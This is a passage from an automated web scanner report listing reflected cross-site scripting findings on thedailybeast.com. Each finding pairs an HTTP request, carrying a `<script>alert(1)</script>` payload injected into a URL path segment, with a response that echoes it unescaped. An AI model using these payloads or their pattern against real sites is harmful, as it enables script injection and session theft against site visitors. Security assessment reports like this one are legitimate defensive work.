Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show16dc8"><script>alert(1)</script>c7aa2ea2192/"/>
...[SNIP]...

1.59. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732d1"><script>alert(1)</script>977331ba64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries732d1"><script>alert(1)</script>977331ba64/newsmaker/sexybeast/red-carpet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries732d1"><script>alert(1)</script>977331ba64/newsmaker/sexybeast/red-carpet/"/>
...[SNIP]...

1.60. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13ab"><script>alert(1)</script>5a87c851130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmakere13ab"><script>alert(1)</script>5a87c851130/sexybeast/red-carpet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmakere13ab"><script>alert(1)</script>5a87c851130/sexybeast/red-carpet/"/>
...[SNIP]...

1.61. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 796db"><script>alert(1)</script>9b9f49e2b7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/red-carpet796db"><script>alert(1)</script>9b9f49e2b7d/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet796db"><script>alert(1)</script>9b9f49e2b7d/"/>
...[SNIP]...

1.62. http://www.thedailybeast.com/newsmaker/art-and-photography/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/art-and-photography/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9545b"><script>alert(1)</script>c2484a9bd2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker9545b"><script>alert(1)</script>c2484a9bd2c/art-and-photography/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker9545b"><script>alert(1)</script>c2484a9bd2c/art-and-photography/"/>
...[SNIP]...

1.63. http://www.thedailybeast.com/newsmaker/book-beast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/book-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc56"><script>alert(1)</script>6f5fb25565f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerbbc56"><script>alert(1)</script>6f5fb25565f/book-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerbbc56"><script>alert(1)</script>6f5fb25565f/book-beast/"/>
...[SNIP]...

1.64. http://www.thedailybeast.com/newsmaker/giving-beast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/giving-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e22"><script>alert(1)</script>0da5f453b9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker49e22"><script>alert(1)</script>0da5f453b9c/giving-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker49e22"><script>alert(1)</script>0da5f453b9c/giving-beast/"/>
...[SNIP]...

1.65. http://www.thedailybeast.com/newsmaker/hungry-beast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/hungry-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3e4a"><script>alert(1)</script>401d4bdd7ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakera3e4a"><script>alert(1)</script>401d4bdd7ff/hungry-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakera3e4a"><script>alert(1)</script>401d4bdd7ff/hungry-beast/"/>
...[SNIP]...

1.66. http://www.thedailybeast.com/newsmaker/innovation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29852"><script>alert(1)</script>c1a9bb7aefe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker29852"><script>alert(1)</script>c1a9bb7aefe/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:57 GMT
Connection: close
Content-Length: 96229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker29852"><script>alert(1)</script>c1a9bb7aefe/innovation/"/>
...[SNIP]...

1.67. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352ed"><script>alert(1)</script>caf4a276ba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker352ed"><script>alert(1)</script>caf4a276ba5/innovation/tweet-sheet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker352ed"><script>alert(1)</script>caf4a276ba5/innovation/tweet-sheet/"/>
...[SNIP]...

1.68. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 347e9"><script>alert(1)</script>7cb016d9715 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/innovation/tweet-sheet347e9"><script>alert(1)</script>7cb016d9715/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet347e9"><script>alert(1)</script>7cb016d9715/"/>
...[SNIP]...

1.69. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/joel-makower34534/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f63"><script>alert(1)</script>9ed2ea6d817 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerd7f63"><script>alert(1)</script>9ed2ea6d817/innovation/tweet-sheet/joel-makower34534/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerd7f63"><script>alert(1)</script>9ed2ea6d817/innovation/tweet-sheet/joel-makower34534/"/>
...[SNIP]...

1.70. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/joel-makower34534/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba48"><script>alert(1)</script>80e4d21e7d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/innovation/tweet-sheet7ba48"><script>alert(1)</script>80e4d21e7d3/joel-makower34534/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet7ba48"><script>alert(1)</script>80e4d21e7d3/joel-makower34534/"/>
...[SNIP]...

1.71. http://www.thedailybeast.com/newsmaker/new-york-fashion-week/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/new-york-fashion-week/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3eb"><script>alert(1)</script>58d47f8e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerfb3eb"><script>alert(1)</script>58d47f8e9b5/new-york-fashion-week/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:00 GMT
Connection: close
Content-Length: 96284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerfb3eb"><script>alert(1)</script>58d47f8e9b5/new-york-fashion-week/"/>
...[SNIP]...

1.72. http://www.thedailybeast.com/newsmaker/politics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac199"><script>alert(1)</script>afaff540528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerac199"><script>alert(1)</script>afaff540528/politics/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:17 GMT
Connection: close
Content-Length: 96219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerac199"><script>alert(1)</script>afaff540528/politics/"/>
...[SNIP]...

1.73. http://www.thedailybeast.com/newsmaker/sexybeast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49168"><script>alert(1)</script>d3a726ee72a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker49168"><script>alert(1)</script>d3a726ee72a/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/newsmaker/politics/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:03 GMT
Connection: close
Content-Length: 96224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker49168"><script>alert(1)</script>d3a726ee72a/sexybeast/"/>
...[SNIP]...

1.74. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166fb"><script>alert(1)</script>e75361cb0b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker166fb"><script>alert(1)</script>e75361cb0b0/sexybeast/tweet-sheet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
